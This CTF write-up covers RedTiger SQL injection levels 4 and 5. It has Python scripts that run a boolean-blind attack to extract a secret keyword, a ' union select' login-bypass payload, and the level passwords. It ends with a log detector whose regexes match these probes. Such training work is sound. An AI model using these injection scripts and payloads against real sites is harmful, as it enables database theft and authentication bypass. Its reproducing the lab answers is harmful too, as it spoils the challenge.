level4
A quick test shows the id parameter has an injection point: id=1 and 1=1 passes, so this is boolean-based.
Blind injection can be driven off the page text "Query returned 0 rows." versus "Query returned 1 rows.".
id=1 and 1=(select length(keyword)=21 from level4_secret) is true, so the field length is 21.
Here you can just guess the number (it usually isn't very long), or brute-force it (I'm not great at writing this, just have a look):
import requests
import re

url = 'http://redtiger.labs.overthewire.org/level4.php?'
data1 = 'id=1 and 1=(select length(keyword)='
data2 = ' from level4_secret)'
num = 1
headers = {
    'Referer': 'http://redtiger.labs.overthewire.org/level4.php'
}
cookies = {
    "level2login": "passwords_will_change_over_time_let_us_do_a_shitty_rhyme",
    "level3login": "feed_the_cat_who_eats_your_bread",
    "level4login": "put_the_kitten_on_your_head"
}
# Try lengths 1..99; only the correct one makes the page say "Query returned 1 rows"
while num < 100:
    dataNew = url + data1 + str(num) + data2
    response = requests.get(url=dataNew, headers=headers, cookies=cookies)
    if re.findall('Query returned 1 rows', response.text):
        print(num)  # length of keyword
        break
    num = num + 1
Next it has to be brute-forced, so write a loop:
import requests
import re

url = 'http://redtiger.labs.overthewire.org/level4.php?'
# {0} is the character position, {1} the ASCII value being tested
data = 'id=1 and (1=(ascii(substr((select keyword from level4_secret limit 1),{0},1))={1}))'
headers = {
    'Referer': 'http://redtiger.labs.overthewire.org/level4.php'
}
cookies = {
    "level2login": "passwords_will_change_over_time_let_us_do_a_shitty_rhyme",
    "level3login": "feed_the_cat_who_eats_your_bread",
    "level4login": "put_the_kitten_on_your_head"
}
url = url + data
keyword = ""
for i in range(1, 22):       # 21 characters, as found above
    for c in range(1, 127):  # ASCII 1..126
        urls = url.format(i, c)
        response = requests.get(url=urls, headers=headers, cookies=cookies)
        if re.findall('Query returned 1 rows.', response.text):
            print(i, c)
            keyword = keyword + chr(c)
            break
print(keyword)
It's really slow to run. Does anyone have a way to speed it up?
killstickswithbr1cks!
level5
Using ' union select 1,2,... you can work out that there are only two columns.
username=' union select 1,md5(1)# builds your own username and md5 password, and password=1 gets through.
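As an added defender-side example (not part of this write-up), a small detector that scans web access log lines for the probe patterns seen in level4 and level5: the repeated "and 1=(select ..." / "ascii(substr(..." oracle queries and the "' union select" login bypass. The log lines, IPs and timestamps are constructed for the example, and it assumes the login parameters show up in the request URL.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus
# Signatures of the probes in this write-up: boolean-blind length/ascii checks on
# the id parameter (level4) and the ' union select login bypass (level5).
BLIND_PATTERNS = [
    re.compile(r"\band\s+1\s*=\s*\(\s*select\b", re.I),   # id=1 and 1=(select ...
    re.compile(r"\bascii\s*\(\s*substr\s*\(", re.I),      # ascii(substr(...))=N
]
UNION_PATTERN = re.compile(r"'\s*union\s+select\b", re.I)  # ' union select 1,md5(1)#
# Combined-style access log line; only the client IP and request target are kept.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" \d{3}')
# Constructed sample log (not from the page): three blind probes from 10.0.0.5, one union-select attempt from 10.0.0.9.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /level4.php?id=1+and+1%3D(select+length(keyword)%3D21+from+level4_secret) HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /level4.php?id=1+and+(1%3D(ascii(substr((select+keyword+from+level4_secret+limit+1)%2C1%2C1))%3D106)) HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /level4.php?id=1+and+(1%3D(ascii(substr((select+keyword+from+level4_secret+limit+1)%2C1%2C1))%3D107)) HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /level5.php?username=%27+union+select+1%2Cmd5(1)%23&password=1 HTTP/1.1" 200 300',
]

def classify_request(target):
    """Return 'union', 'blind' or None for one URL-encoded request target."""
    decoded = unquote_plus(target)
    if UNION_PATTERN.search(decoded):
        return "union"
    if any(p.search(decoded) for p in BLIND_PATTERNS):
        return "blind"
    return None

def detect_sqli_probes(lines, blind_threshold=3):
    """Count suspicious requests per client IP and return {ip: [reasons]}. Blind
    probes alert only past blind_threshold (the oracle needs many requests)."""
    counts = {}
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue  # malformed line: skip it rather than crash the detector
        kind = classify_request(m.group("target"))
        if kind:
            counts.setdefault(m.group("ip"), Counter())[kind] += 1
    alerts = {}
    for ip, c in counts.items():
        reasons = []
        if c["blind"] >= blind_threshold:
            reasons.append(f"{c['blind']} boolean-blind probes")
        if c["union"]:
            reasons.append(f"{c['union']} union-select attempts")
        if reasons:
            alerts[ip] = reasons
    return alerts
```

On real logs the threshold and signatures need tuning per application, and a POST login body would not appear in an access log, which is why the level5 line here is a constructed GET.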